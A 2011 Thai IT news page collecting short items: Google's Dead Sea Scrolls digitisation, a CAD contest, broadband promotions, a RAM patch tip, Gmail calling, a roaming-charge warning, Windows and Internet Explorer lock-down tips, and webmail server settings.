สื่อ online สร้างเครือข่ายไร้พรมแดน เว็บข่าว  Online 24 ชั่วโมง
IT NEWS CYBERWORLD

Home RTV1  Rtv1news  Borsae News   ติดต่อนักข่าว พิราบขาว และเบาะแส   แนะนำองค์กร กลุ่มฯ เบาะแส  

ฟู๋ลู่ซวงฉวน

ขอให้ทุกท่านจงมีแต่ความสุข

ตลอดปี 2554

จากทีมข่าวไอที

   

              
   
ดาว์โหลด เว็บบราวเซอร์ ที่ใช้ท่องความเร็วในการเล่นอินเตอร์เน็ตที่ดีที่สุดในการเข้าชมเว็บไซต์ของทางสถานี อาร์ ทีวี วัน

RTV1   STATION   THAILAND
 
สำนักข่าวเด็กและเยาวชน สถานี อาร์ ทีวี วีน สื่อ Online สร้างเครือข่ายไร้พรมแดน เว็บข่าว 24 ชั่วโมง
 
 
 
 
 
 
สถานี อาร์ ทีวี วัน วิทยุ โทรทัศน์ เพื่อข่าวสาร สาระบันเทิง และเพื่อการศึกษา ผลิตโดย กลุ่มเยาวชนเพื่อเยาวชน +
 
แชร์ไปที่ Facebook
 

กูเกิล นำจารึกโบราณ 'Dead Sea Scrolls' มาเผยแพร่บนโลกออนไลน์

พ, 27/09/2011 - 08:33 
 
กูเกิลร่วมมือกับพิพิธภัณฑ์สถานแห่งชาติของอิสราเอลในการที่จะนำ Dead Sea Scroll (จารึกโบราณที่มีเนื้อหาเกี่ยวกับพระคัมภีร์ไบเบิ้ลที่ถูกค้นพบในประเทศอิสราเอล) มาออนไลน์บนโลกไซเบอร์ ที่ซึ่งเป็นส่วนหนึ่งของโครงการที่รู้จักกันในนามของ The Digital Dead Sea Scrolls และมีการใช้เงินลงทุนมากถึง 3.5 พันล้านเหรียญสหรัฐฯ เพื่อทำให้จารึกโบราณเกือบทั้งหมดเผยแพร่แก่ทุกคนที่เข้าถึงอินเทอร์เน็ตได้ ซึ่งปัจจุบันนี้มีจารึกเพียงห้าฉบับเท่านั้นที่เผยแพร่แก่สายตาชาวโลกออนไลน์

โดยจารึกโบราณทั้งห้าฉบับที่ถูกเปลี่ยนแปลงข้อมูลไปเป็นดิจิตอล ได้แก่ Great Isaiah scroll, the Community Rule scroll, the commentary on Habbakuk, the Temple scroll และ the War scroll ซึ่งทั้งหมดได้ถูกถ่ายภาพผ่านเทคโนโลยีที่ทันสมัยในการแปลงเพื่อให้ภาพมีความชัดเจนมากที่สุด นอกจากนี้ จารึกออนไลน์ดังกล่าวยังมาพร้อมกับความสามารถในการค้นหา และแปลเป็นภาษาอังกฤษ สำหรับ Dead Sea Scrolls นั้นได้ถูกเชื่อมั่นว่าเป็นการค้นพบหลักฐานทางโบราณคดีที่สำคัญที่สุดในช่วงศตวรรษที่ 20 โดยมันได้ถูกเขียนขึ้นหรือรวบรวมไว้ตั้งแต่ช่วงระหว่าง 150 ปีก่อนศริสตกาล จนถึง ค.ศ. 70 โดยชาวยิวที่หนีออกจากเมืองเยรูซาเล็มเมื่อ 2,000 ปีก่อน ซึ่งในจารึกนั้นได้มีการกล่าวถึงเนื้อหาที่เกี่ยวข้องกับพระคัมภีร์ไบเบิ้ล และต่อมาได้ถูกค้นพบจากนักโบราณคดีใน ค.ศ 1947 และ 1956 ที่ถ้ำกุุมรานบนชายฝั่งของทะเลเดดซี ด้านสำนักข่าวเอพี รายงานว่า โปรเจ็คดังกล่าวจะเสร็จสมบูรณ์ภายในปี 2016 ที่ซึ่งเป็นเวลาที่จารึกโบราณเกือบทั้งหมดจะสามารถเผยแพร่ทางออนไลน์ได้

ผู้มีจิตศรัทธาร่วมใจบริจาค...ช่วยผู้ประสบอุทกภัย

พ, 21/09/2011 - 13:33 
 

นักศึกษาคนไหนที่คิดว่ามีจินตนาการในการออกแบบ"เครื่องเล่นในสวนสนุก
"ที่สุดแสนล้ำเลิศ บริษัท แอพพลิแคด ขอเชิญชวน มาท้าประลองฝีมือกับเรา ชิงทุนการศึกษามูลค่า 50,000 บาท

กรุงเทพฯ--22 ก.ย.--แอพพลิแคด
นักศึกษาคนไหนที่คิดว่ามีจินตนาการในการออกแบบ"เครื่องเล่นในสวนสนุก"ที่สุดแสนล้ำเลิศ บริษัท แอพพลิแคด ขอเชิญชวน มาท้าประลองฝีมือกับเรา ชิงทุนการศึกษามูลค่า 50,000 บาท


บริษัท แอพพลิแคด จำกัด เชิญน้องๆนักศึกษา ร่วมแข่งขัน AppliCAD 3D DESIGN & SKILL CONTEST ในหัวข้อการแข่งขัน"ออกแบบเครื่องเล่นในสวนสนุก" โดยใช้ความคิดสร้างสรร และจินตนาการของตัวเองใส่ไปให้เต็มที่กับการออกแบบ ในครั้งนี้ โดยใช้ โปรแกรม SolidWorks ออกแบบ เพื่อชิงทุนการศึกษา มูลค่า 50,000 บาท และผู้ที่ชนะเลิศมีสิทธิ์ได้รับ PacKateไปเที่ยวประเทศสิงคโปร์ สามารถเข้าไปดูรายละเอียดและดาวโหลดใบสมัครได้แล้วที่เว็บแอพพลิแคดได้เลย กิจกรรมนี้ไม่ควรพลาดเด็ดขาดนะคะ น้องๆ ที่มีใจรักในการออกแบบ โหลดใบสมัครด่วนจ้าhttp://www.applicadthai.com/3d-design-skill-contest-2011/

 
 

Bangkok International Game Festival 2011 (BIG Festival)

“เอซุส” จับมือ “ทรู” ส่งเสริมอุตสาหกรรมเกมและเทคโนโลยี จัดงาน Bangkok International Game Festival 2011 (BIG Festival)

กรุงเทพฯ--22 ก.ย.--โปรเฟสชันแนล มีเดีย บิสซิเนส
“เอซุส” จับมือ “ทรู” ส่งเสริมอุตสาหกรรมเกมและเทคโนโลยีจัดงาน Bangkok International Game Festival 2011 (BIG Festival)ระหว่างวันที่ 6-9 ตุลาคม ณ ศูนย์การค้าสยามพารากอน


จากภาพ นายมนต์ธีร์ วุฒิรงค์ ผู้จัดการพัฒนาธุรกิจกลุ่มผลิตภัณฑ์โอเพ่น แพลทฟอร์ม (Open Platform – OPBG) บริษัท อัสซุสเทค คอมพิวเตอร์ (ประเทศไทย) จำกัด ถ่ายภาพในงานแถลงข่าวการจัดงาน Bangkok International Game Festival 2011 หรือ BIG Festival ซึ่งจะจัดขึ้นระหว่างวันที่ 6-9 ตุลาคม 2011 ณ ชั้น 5 รอยัลพารากอนฮอลล์ 1-3 ศูนย์การค้าสยามพารากอน โดยงานในครั้งนี้เอซุสร่วมร่วมกับ บริษัท ทรู ดิจิตอล คอนเท้นท์ แอนด์ มีเดีย จำกัด และกลุ่มพันธมิตรให้การสนับสนุน ด้วยความตั้งใจที่จะส่งเสริมพัฒนาวงการอุตสาหกรรมเกมและเทคโนโลยีของประเทศไทย รวมถึงสนับสนุนให้เยาวชนไทยใช้เวลาว่างให้เกิดประโยชน์ ณ สถานที่แถลงข่าว ห้อง VIP ชั้น 29 อาคารทรู ทาวเวอร์ เมื่อช่วงเช้าของวันที่ 20 กันยายน นี้

มาเธอร์บอร์ดเอซุส: อันดับ 1 ของโลก
เอซุส ผู้ผลิตมาเธอร์บอร์ดที่มียอดขายและได้รับรางวัลมากที่สุดในโลก เป็นผู้ครองส่วนแบ่งตลาดสูงสุดทั่วโลก โดยปัจจุบันเอซุสมาเธอร์บอร์ดมีส่วนแบ่งทางการตลาดในประเทศไทยสูงถึง 55% เอซุสเป็นผู้คิดค้นนวัตกรรมมากมายจนได้รับการยอมรับให้เป็นมาตรฐานอุตสาหกรรม โดยมีเทคโนโลยีล่าสุดอันมีชื่อเสียง ได้แก่ Core Unlocker, Disk Unlocker, Protect 3.0 และ Dual Intelligent Processors รายแรกของโลกที่ผสานเทคโนโลยี TurboV Processing Unit (TPU) และ Energy Processing Unit (EPU) เข้าด้วยกัน เพื่อสมรรถนะที่เหนือกว่าและช่วยลดการใช้พลังงาน ด้วยความชำนาญและความมุ่งมั่นที่จะยกระดับการออกแบบมาเธอร์บอร์ด ทำให้เอซุสยังคงครองตำแหน่งผู้นำในด้านประสิทธิภาพ ความปลอดภัย และน่าเชื่อถือของมาเธอร์บอร์ดได้ต่อไปอย่างมั่นคง

รายละเอียดเพิ่มเติม กรุณาติดต่อ:
ASUS Call Center: 02-401-1717 หรือ www.asus.co.th
ทีมประชาสัมพันธ์เอซุส : บริษัท โปรเฟสชันแนล มีเดีย บิสซิเนส จำกัด :
คุณพรรษชล พรหมภัทรพันธ์ (เพลย์) และคุณณัฏฐ์ธนิน พิเชฐศีล (จอย)
โทรศัพท์ 02-530-3218 # 13 หรือ 16 โทรสาร 02-530-4542-3
อีเมล์:patsachon_p@pmb.co.th, nattanin_p@pmb.co.th

 

เรียนรู้ไปกับหมอ IT ปี 2011


พิมพ์หน้านี้

ที่ผ่านๆมา ทีทีแอนด์ที จะเป็นผู้ให้บริการที่พยายามปรับเพิ่มความเร็วในราคาที่ถูกลง กล่าวคือ เร็วขึ้นในราคาเดิม ซึ่งก็ไม่รู้ว่าเป็นสาเหตุหรือไม่ที่ทำให้ทีโอทีและค่ายอื่นต้องปรับบ้างเพื่อรักษาฐานลูกค้า เพียงแต่ภาพที่ปรากฏนั้นคือ ค่ายอื่นจะเพิ่มความเร็วไล่หลังเสมอ

มาปีนี้ .. ทีทีแอนด์ทีแยกตัวออกมาเป็น 3bb ซึ่งให้บริการเน็ตอย่างเดียว ไม่มีโทรศัพท์พื้นฐาน และค่อนข้างแยกออกมาอย่างไม่ค่อยจะราบรื่นนัก เพราะเกิดกรณีพิพาทดังข่าวที่ผ่านมาระหว่าง 3bb กับ tt&t และ 3bb กับ ผู้ใช้บริการหรือลูกค้าที่ใช้เน็ต ที่มีผลให้ลูกค้าหลายรายรวมตัวกันร้องทุกข์ว่าถูกลอยแพ จากเหตุสองหน่วยงานมีปัญหากัน

เข้าใจว่า ผลจากการนี้ .. คงทำให้ 3bb หยุดการปรับความเร็ว .. ยังคงเป็น 6 เมก 590 บาทเท่าเดิม ขณะที่ ทรูไฮสปีด เป็นเอกชนที่ปรับความเร็วขึ้นไปแทน คือ 7 เมก 599 บาทหรือ 7 เมกในราคาเดิมของ 6 เมกนั่นเอง

จากนั้น มีผู้เรียกร้องให้ค่ายอื่น ปรับความเร็วขึ้นให้ โดยเก็บค่าบริการเท่าเดิม เพราะมาตรฐานความเร็วขั้นต่ำ เริ่มมีการกำหนดขึ้นมาใหม่โดยค่ายเอกชนอีกคำรบ แม้จะไม่ใช่ค่ายเดิม

สงสัยเหมือนกันนะ .. ทำไมต้องมาทะยอยปรับกันแบบนี้ .. ทำไมไม่กำหนดเป็นมาตรฐานความเร็วขั้นต่ำกันไปเลย (สำหรับพื้นที่ที่รองรับได้) ต้องมาคอยลุ้นให้มีการแข่งขันราคากันในตลาดเพื่อดึงดูดลูกค้า หรือจะพยายามบอกว่า หากมิใช่การแข่งขันเสรี หรือหากเป็นการผูกขาด ราคาจะไม่ลดลงได้แบบนี้อย่างแน่นอน  ถ้าอย่างนั้นคงเป็นการโชคดีของผู้ใช้บริการละซีท่า ที่ผู้ให้บริการเหล่านั้นยังไม่รวมตัวกันเป็นสมาคมที่จะมาผูกขาดราคา  ถ้ารวมตัวกันฮั้วราคากันได้ละก้อ .. นึกภาพแล้วสยองจริงๆ 

อยากให้พัฒนาศักยภาพเรื่องความเร็วของไฮสปีดให้มีความเท่าเทียมกัน ไปสู่จุดที่เป็นมาตรฐานของประเทศ ไหนๆก็ต้องการให้เป็นโครงสร้างพื้นฐานเหมือนไฟฟ้า ประปา กันแล้ว น่าจะพุ่งเป้าไปให้ถึงจุดนั้นกันเลย  จะบอกว่าทำไม่ได้ได้ยังไงในเมื่อ พอมีการแข่งขันก็อัพความเร็วให้ได้เรื่อยๆ เนี่ยก็ยังทำได้เลย

และคราวนี้ ทีโอที ก็ปล่อยโปรใหม่ออกมาจนได้   เดือนกันยายนนี้เอง .. จากเดิม โปร Jetpack 6 เมก/512 เค 590บาท  มาเป็น turbo speed ความเร็วดาวน์โหลด 8 เมก อัพโหลด 1 เมก ในราคาเดิม 590 บาท เฉพาะพื้นที่ที่มีโหนดหรือชุมสายไม่ห่างจากผู้ใช้บริการมากนักเช่นไม่เกิน 5 กม. ก็ไม่แน่ใจเหมือนกันว่า ออกนอกนั้นเท่าไหร่ เพราะไม่ได้ระบุเรื่องในประเทศนอกประเทศ คงต้องไปหาเว็บวัดความเร็วกันเอาเอง  ก็ถือว่าเป็นขั้นต่ำของไทยละกันนะ ยกเว้นพื้นที่ที่ยังไม่มีความพร้อม .. ก็อยากให้มีการพัฒนาให้ทั่วถึง ก่อนที่จะไปทำอย่างอื่นกัน หรือไม่ก็เปลี่ยนไปเป็น wireless 3 G ในพื้นที่ที่สายเข้าถึงไม่ได้จริงๆ หรือไกลชุมสายมาก แต่เน็ตไร้สายก็สู้เน็ตตามสายไม่ได้อยู่ดี เพราะการถูกรบกวนมีได้มากกว่า 

โชคดี บ้านเรายังรองรับความเร็วขนาดนี้ได้อยู่ .. ที่บ้านไปติดต่อชุมสายเมื่อเช้า ช่างปล่อยความเร็วใหม่ให้ทดสอบการใช้งานศุกร์เสาร์อาทิตย์ เพราะต้องการตรวจความเสถียร วันจันทร์จึงจะไปทำสัญญาการใช้งาน 12 รอบบิลในโปรฯนี้ 

ใครยังไม่ได้ไปติดต่อศูนย์ฯ ลองไปเช็คดูก่อนได้ เพื่อรักษาสิทธิ


พิมพ์หน้านี้

ปัจจุบัน แรมอัพได้มากขึ้นสูงขึ้นเรื่อยๆ แต่ปัญหาคือ ระบบปฏิบัติการวินโดว์ 32 บิตที่ใช้ๆกัน แม้แต่ วินโดว์ล่าสุดคือ วินโดว์7 ถ้ายังเป็นแบบ 32 บิตที่ส่วนใหญ่ใช้กันอยู่ ก็จะมองเห็นแรมได้สูงสุด 3 กิ๊กกว่าๆเท่านั้น คือ ไม่ถึง 4 กิ๊ก มองเห็นและใช้แรมทำงานได้แค่นั้น ทั้งๆที่ใส่แรมไปตั้ง 4-8 กิ๊กเข้าไปล้วก็ยังเห็นและใช้งานได้แค่ 3 กิ๊ก  ต้องลงวินโดว์7 แบบ 64 บิต จึงจะเห็นครบ แต่นั่นหมายความว่า ต้องหาไดรเวอร์แบบ 64 บิตมาลงด้วย และในบางโปรแกรมอาจรันบน 64 บิตไม่ได้ ตามที่เขาพูดๆกันมาน่ะนะ

ที่สำคัญคือ หลายคนไม่อยากลงโปรแกรมใหม่ เพราะลงโปรแกรมต่างๆไว้เยอะ ถ้าต้องลงใหม่งานใหญ่ตามมาทีเดียว

กระทั่งได้ไปพบผู้แนะนำบนเน็ต และทดลองทำตามแล้วได้ผล

นั่นคือ การใช้ โปรแกรม Ramfix for Win7 ซึ่งสร้างโดย ชาวรัสเซียท่านหนึ่ง จำชื่อไม่ได้เสียแล้ว ลองค้นกูเกิ้ลดูก็จะทราบ มีข้อมูลอยู่ครบ ส่วนน้ำใสนั้นได้ข้อมูลจากเว็บนี้ค่ะ 

http://www.baanfarsang.com/thread1614.html

หลังจากลงโปรแกรมแล้วจะเห็น 4 กิ๊กตามจริงได้ และดูจาก task manager ก็ทำงานได้ทั้ง 4 กิ๊กจริงๆ

หมายเหตุ .. ลงกับโน๊ตบุค ระบบปฏิบัติการวินโดว์ 7 แบบ 32 บิต หลังมีการอัพเกรดแรมจาก 2 กิ๊กเป็น 4 กิ๊ก 

อีกเว็บที่แนะนำ ... http://sites.google.com/site/redcyberkid/home/windows-basic/win7-tip-01/tip-55

กูเกิลเจ๋ง! โทรผ่านจีเมล์ทั้งที่บ้าน-มือถือ ค่าบริการไม่ถึง1บาท

โดยรายการเพื่อนเยาวชน เพื่อเยาวชนเมื่อ 3 สิงหาคม 2011 เวลา 21:21 น.

วันที่(3 ส.ค.54) ผู้สื่อข่าวรายงานว่า กูเกิล (Google)มาแรงอีกแล้ว เปิดตัวฟีเจอร์ใหม่ให้ผู้ใช้งาน Gmail ในประเทศไทยสามารถต่อโทรศัพท์จากคอมพิวเตอร์ไปยังโทรศัพท์บ้าน หรือโทรศัพท์มือถือได้แล้ว จากเดิมที่ให้บริการเฉพาะในสหรัฐฯและยุโรป มาเป็น 150 ประเทศ 38 ภาษา ราคาเริ่มต้นเพียงนาทีละ 0.02 เหรียญ หรือประมาณ 0.6 บาท (60 สตางค์)

ข้อมูลจากกูเกิลระบุว่า นอกจากไทย กูเกิลได้ขยายพื้นที่ให้บริการไปยังประเทศอื่นในเอเชียอย่างญี่ปุ่น เกาหลี ฟิลิปปินส์ เวียดนาม และจีน โดยขณะนี้ ผู้ใช้จีเมลสามารถซื้อเครดิตสำหรับโทรศัพท์ได้ใน 4 สกุลเงิน คือยูโร ปอนด์ ดอลลาร์แคนาดา และดอลลาร์สหรัฐ ซึ่งทั้งหมดผู้ใช้จะไม่ต้องเสียค่าธรรมเนียมโทรศัพท์ทางไกล แต่สามารถเสียเฉพาะค่าบริการตามเวลาที่คุย

สำหรับประเทศไทย หากโทรเข้าโทรศัพท์บ้านผู้ใช้จะเสียค่าบริการ 0.02 เหรียญสหรัฐต่อนาที (60 สตางค์) ขณะที่โทรเข้าโทรศัพท์มือถือจะเสียค่าบริการ 0.03 เหรียญ (ราว 90 สตางค์) ถือเป็นอัตราที่ต่ำเมื่อเทียบกับการโทรเข้าโทรศัพท์มือถือในประเทศอังกฤษ ที่คิดนาทีละ 0.10 เหรียญ (ราว 3 บาท) หรือ 0.15 เหรียญต่อนาที (ราว 4.5 บาท) หากโทรเข้าโทรศัพท์มือถือในแม็กซีโก

ผู้สนใจสามารถโทรศัพท์ผ่าน Gmail ได้เพียงมองหาสัญลักษณ์ไอคอนรูปโทรศัพท์สีเขียว โดยจำเป็นต้องติดตั้งโปรแกรมเสริม voice และ video plug-in ก่อนจึงจะสามารถใช้งานได้ โดยหากใครที่ใช้งาน Google Apps อยู่แล้ว ก็สามารถใช่งานผ่านฟังก์ชัน Google Voice และ Google Checkout ได้ในอัตราเดียวกัน

มหันตภัยใช้เน็ตบนมือถือในต่างประเทศ...วันเดียวเจอค่าเน็ตแสนกว่าบาท !!!

โดยสถานี RTV1 สำนักข่าวออนไลน์ 24 ชั่วโมงเมื่อ 31 กรกฎาคม 2011 เวลา 19:25 น.

มีเรื่องอยากเตือนเพื่อนๆที่ใช้โทรศัพท์แสนรู้ทั้งหลายให้ระมัดระวังการใช้เน็ตบนมือถือในต่างประเทศเพราะมีเพื่อนที่ทำปั๊มด้วยกันต้องหน้า
มืดเจอค่าเน็ตมหาโหดมาแล้ว

...เรื่องคือเพื่อนเค้าเดินทางไปฮ่องกง ถึงที่นั่นประมาณ 5 เย็น เมื่อไปถึงได้มีการใช้เน็ตผ่านโทรศัพท์ Iphone 4 โดยเลือกเฉพาะที่ระบุ Free Public
Wi-Fi เท่านั้น
เพื่อเข้าเวบ oil-price.net เช็คราคาน้ำมัน 2-3 ครั้ง และดูวงจรปิด...วันรุ่งขึ้นต้องปิดโทรศัพท์เนื่องจากมีข้อความแจ้งจำนวนข้อมูลการใช้เน็ต
โดยสรุปคือใช้อินเตอร์เน็ตผ่านมือถือไป 1 วัน...เมื่อกลับถึงเมืองไทยก็ได้รับแจ้งว่ามีค่าใช้จ่าย GPRS Roaming จำนวน 123,967บาท
เพื่อนแย้งว่าเลือกใช้เฉพาะ Free Wi-Fi ไม่ได้ใช้ Edge เลยซึ่งเจ้าหน้าที่ศูนย์บริการก็ชี้แจงว่าถึงแม้จะเลือกใช้ Free Wi-Fi แต่เมื่อของฟรี
สัญญาณอ่อน Edge ก็จะเข้าทำงานแทนโดยอัตโนมัติ (และผู้ใช้ก็จะไม่สามารถรู้ได้เลยว่าตอนนั้นใช้ของฟรีหรือไม่ฟรี)...ผลจากการเจรจา...ทางเครือข่ายแจ้งกลับว่าได้ช่วยเต็มที่โดยการทำโปรโมชั่น
ครอบแล้วครอบอีก หลงโจ้งคงเหลือจิ๊บๆ แค่ 23,418บาทเท่านั้นเอ๊ง !!!...ถึงกระนั้นเพื่อน(และแม่มด)ก็ยังมองว่าสูงเกินไปสำหรับการใช้งาน
อินเตอร์เน็ต...แค่ 1 วัน...!!!...เพื่อนของเพื่อนเลยแนะนำให้ทำเรื่องร้องเรียนไปยังสบท. หมายเลขโทรศัพท์ 1200ทาง สบท.อธิบายให้ฟังว่า...
ในกรณีที่เครือข่ายมีสัญญาแบบเหมาจ่ายกับเครือข่ายต่างประเทศอยู่แล้วก็น่าจะปรับลดได้เพราะไม่ได้มีค่าใช้จ่ายเพิ่มขึ้นแต่อย่างใดแต่ถ้า
ไม่มีสัญญา
เหมาจ่ายก็ต้องจ่ายตามต่างประเทศเรียกเก็บ(ซึ่งเขาแจ้งไว้ว่า KB ละ 55 สตางค์)...ปัจจุบันเรื่องยังอยู่ที่ สบท.ล่าสุดคือเครือข่ายยืนยันว่าต้องเก็บตามนั้นไม่ลดแม้แต่บาทเดียว...ก็เตือนเพื่อนๆไว้นะคะ ความไม่รู้เท่าทันเทคโนโลยีที่เราใช้ อาจนำภัย(ทางการเงิน)อันใหญ่หลวงมาให้ได้ก่อนใช้ก็ศึกษาให้ดีก่อน

จากกูรู

Computer : วิธี Lock Internet Explorer โดยการตั้ง Password


1. เปิด Internet Explorer ขึ้นมา แล้วไปเลือกที่ Internet option

2.เลือก Content แล้วคลิ๊กที่ Enable

3.พอเข้ามาให้เลือกที่แท็บ General แล้วเลือก Create Password

4.ในช่อง Password และ Confirm Password ให้กรอก Password ที่เราต้องการเอาไว้
และตรงช่อง Hint ช่องนี้เป็นช่องที่แสดงข้อความเมื่อมีใครเข้ามาใช้ Internet Explorer
และได้ทำการพิมพ์ที่ช่อง address bar และกด Enter ก็จะขึ้นข้อความที่เรากรอกไว้ตรง
Hint ด้วย เลือกพิมพ์ตามที่ชอบ

5.คราวนี้ก็สามารถ Lock ไม่ให้ เล่น Internet ได้ เวลาถ้าใครเข้ามาเล่น ก็จะโดนถาม
Password ก่อนทุกครั้งครับ

Computer : วิธีทำไม่ให้ใครมาลงโปรแกรมในเครื่องเพิ่มได้

วิธีทำไม่ให้ใครมาลงโปรแกรมในเครื่องเพิ่มได้ โดยไม่ต้องลงโปรแกรมเพิ่ม ใช้ไอ้ที่มีอยู่ใน Windows นี่แหละ จัดการซะเลย

1.Start > run > gpedit.msc

2. เข้ามาที่ Administrative Templates > Windows Components > Windows Installer > Disable Windows Installer แล้ว ดับเบิ้ลคลิ๊กเข้าไป

3.ให้คลิ๊กแท๊บ Setting > Enabled > ตรงช่องให้เลือก Always และก็คลิ๊ก OK

4. ส่วนฟังก์ชันเพิ่มเติมให้อ่านตรงแท๊บที่เป็นภาษาอังกฤษเอานะครับ น่าจะมีลูกเล่นเพิ่มเติมขึ้น ลองดูครับ

Hotmail ขณะนี้คุณสามารถเชื่อมต่อกับ Microsoft Outlook เป็นบัญชีอีเมล POP ใด ๆ เมื่อต้องการทำเช่นนั้นคุณจำเป็นต้องดาวน์โหลด Microsoft Office Outlook Connector

บริการ Google Gmail มีเซิร์ฟเวอร์ SMTP (เซิร์ฟเวอร์จดหมายขาออก) สำหรับบัญชี Gmail เมื่อต้องการใช้กับเซิร์ฟเวอร์ Google Gmail SMTP ให้ใช้ข้อมูลต่อไปนี้

ตั้งค่า Incoming และ Outgoing Mail Server

Google Gmail ออก Mail Server (SMTP) : smtp.gmail.com
เซิร์ฟเวอร์ Gmail SMTP ต้องรับรองความถูกต้อง (ใช้การตั้งค่าเดียวกันกับสำหรับเซิร์ฟเวอร์จดหมายขาเข้า)
Google Gmail SMTP Server ต้องใช้การเชื่อมต่อที่เข้ารหัส (SSL) ที่ 465 พอร์ต
 เพราะเหตุใดและเมื่อใดที่ฉันต้องตั้งค่าเหล่านี้หรือไม่

Hotmail, Yahoo! Mail, Gmail และผู้ให้บริการอื่น ๆ ที่มีพื้นบริการอีเมลที่ออกแบบมาเพื่อให้คุณมีกล่องจดหมายเข้าใช้งานอีเมล์ได้โดยตรงจากเว็บ แต่จะออนไลน์และการเข้าสู่ระบบเว็บไซต์ของพวกเขาไม่เสมอวิธีที่สะดวกที่สุดสำหรับการอ่านและส่งอีเมล

ในทางกลับกันคุณมีทางเลือกในการส่งและรับอีเมล์ผ่านกล่องจดหมายดังกล่าวโดยการใช้อีเมลไคลเอนต์ซอฟต์แวร์ท้องถิ่นเช่น Outlook Express, Microsoft Outlook, Thunderbird, ฯลฯ เพื่อให้สามารถใช้มันคุณต้องกำหนดค่าของคุณ ซอฟต์แวร์อีเมล์ที่มีขาเข้าและขาออกเซิร์ฟเวอร์อีเมลของผู้ให้บริการอีเมลของคุณ (Hotmail, Gmail, Yahoo! Mail หรืออื่น ๆ )

 การตั้งค่า Mail Server

•การตั้งค่า Hotmail

เป็นบริการอีเมลทางเว็บอื่น ๆ Hotmail ใช้โปรโตคอล HTTP สำหรับการเชื่อมต่อคุณไปยังกล่องจดหมายของคุณ ถ้าคุณต้องการที่จะส่งและรับอีเมล Hotmail ใช้ซอฟต์แวร์ไคลเอ็นต์อีเมลแล้วซอฟต์แวร์ของคุณจะต้องสนับสนุนการเข้าถึง Hotmail HTTP สำหรับบัญชีอีเมลของคุณ บางโปรแกรมรับส่งอีเมลเช่น Outlook Express หรือ Microsoft Outlook, builtin สนับสนุนการเสนอบัญชี Hotmail, ดังนั้นคุณจะต้องเลือก HTTP เมื่อคุณถูกขอให้เลือกชนิดบัญชีของคุณอีเมลและเลือกเป็น HTTP Hotmail ผู้ให้บริการจดหมาย

Mail Server การตั้งค่าสำหรับ Hotmail ใช้ Microsoft Outlook Connector

หากคุณใช้ Microsoft Outlook และ Outlook Connector, คุณสามารถกำหนดบัญชี Hotmail ของคุณเช่นเดียวกับบัญชีอีเมล POP3 ปกติ :
Hotmail Incoming Mail Server (POP3) — pop3.live.com (เข้าสู่ระบบโดยใช้ Secure Password Authentification — สปา, พอร์ตของเซิร์ฟเวอร์ mail : 995)
Hotmail ขาออก Mail Server (SMTP) — smtp.live.com (SSL เปิดใช้ port 25)
Yahoo! • การตั้งค่าจดหมาย

yahoo Mail นำเสนอการเข้าถึง POP3 มาตรฐานสำหรับการรับอีเมลที่เข้ามาผ่านกล่องจดหมายของ Yahoo ของคุณโดยใช้ซอฟแวร์ไคลเอนต์อีเมลที่คุณชื่นชอบ กับการตั้งค่าอีเมลไคลเอ็นต์ของคุณสำหรับการทำงานกับบัญชี Yahoo ของคุณคุณจำเป็นต้องเลือกโปรโตคอล POP3 และใช้การตั้งค่าเซิร์ฟเวอร์จดหมายดังต่อไปนี้
yahoo ที่เข้ามา Mail Server (POP3) — pop.mail.yahoo.com (port 110)
yahoo ที่ส่งออก Mail Server (SMTP) — smtp.mail.yahoo.com (port 25)
POP Yahoo! Mail Plus การตั้งค่าเซิร์ฟเวอร์อีเมล
yahoo พลัสที่เข้ามา Mail Server (POP3) — plus.pop.mail.yahoo.com (SSL เปิดใช้งานพอร์ต 995)
yahoo Plus ที่ส่งออก Mail Server (SMTP) — plus.smtp.mail.yahoo.com (SSL เปิดใช้งานพอร์ต 465, การตรวจสอบการใช้งาน)
•การตั้งค่า Gmail Google

บริการ Google GMail นำเสนอการเข้าถึงลูกค้าอีเมลสำหรับการเรียกคืนและส่งอีเมลผ่านบัญชี Gmail ของคุณ อย่างไรก็ตามเพื่อความปลอดภัย Gmail ใช้ POP3 กว่าการเชื่อมต่อ SSL เพื่อให้แน่ใจว่าอีเมลไคลเอ็นต์ของคุณสนับสนุนการเชื่อมต่อที่เข้ารหัส SSL
Google Gmail Incoming Mail Server (POP3) — pop.gmail.com (SSL เปิดใช้งานพอร์ต 995)
เซิร์ฟเวอร์จดหมายขาออก — ใช้ที่อยู่ SMTP เมล์เซิร์ฟเวอร์โดยท้องถิ่น smtp.gmail.com หรือ ISP ของคุณ (SSL เปิดใช้งานพอร์ต 465)
•การตั้งค่า Mail MSN

บริการอีเมล MSN ทำให้คุณสามารถใช้ MSN POP3 SMTP และเซิร์ฟเวอร์ในการเข้าถึงกล่องจดหมายของคุณ MSN
MSN Incoming Mail Server (POP3) — pop3.email.msn.com (110 พอร์ตโดยใช้ Secure Password Authentication — SPA)
MSN ที่ส่งออก Mail Server — smtp.email.msn.com (เลือก”เซิร์ฟเวอร์ขาออกของฉันต้องการการตรวจสอบสิทธิ์”)
•การตั้งค่า Lycos Mail

บริการ Lycos Mail Plus ช่วยให้คุณสามารถใช้เซิร์ฟเวอร์ของ POP3 และ SMTP สำหรับการเข้าถึงกล่องจดหมายของคุณ Lycos
Lycos อีเมลที่ได้รับ Mail Server (POP3) — pop.mail.lycos.com (port 110)
เซิร์ฟเวอร์จดหมายขาออก — smtp.mail.lycos.com หรือการใช้ภายใน ISP mail SMTP เซิร์ฟเวอร์ของคุณ
•การตั้งค่า AOL Mail

บริการอีเมล AOL เป็นเว็บระบบตามที่ออกแบบมาสำหรับการจัดการกล่องจดหมายของคุณผ่านเข้า AOL HTTP IMAP ซึ่งแตกต่างจาก Hotmail, คุณสามารถใช้โปรแกรมอีเมลเพื่อการเข้าถึงกล่องจดหมายของคุณ AOL ตราบใดที่จะสนับสนุนโปรโตคอล IMAP
AOL Incoming Mail Server (IMAP) — imap.aol.com (143 พอร์ต)
เซิร์ฟเวอร์ขาออก AOL Mail — smtp.aol.com หรือการใช้ภายใน ISP mail SMTP เซิร์ฟเวอร์ของคุณ
• Mail.com Mail การตั้งค่า

บริการอีเมล Mail.com ช่วยให้คุณสามารถใช้เซิร์ฟเวอร์ของ POP3 และ SMTP สำหรับการเข้าถึงกล่องจดหมายของคุณ Mail.com
Mail.com อีเมลที่ได้รับ Mail Server (POP3) — pop1.mail.com (port 110)
เซิร์ฟเวอร์จดหมายขาออก — การใช้ภายใน ISP mail SMTP เซิร์ฟเวอร์ของคุณ
Netscape Internet •การตั้งค่า Mail Service

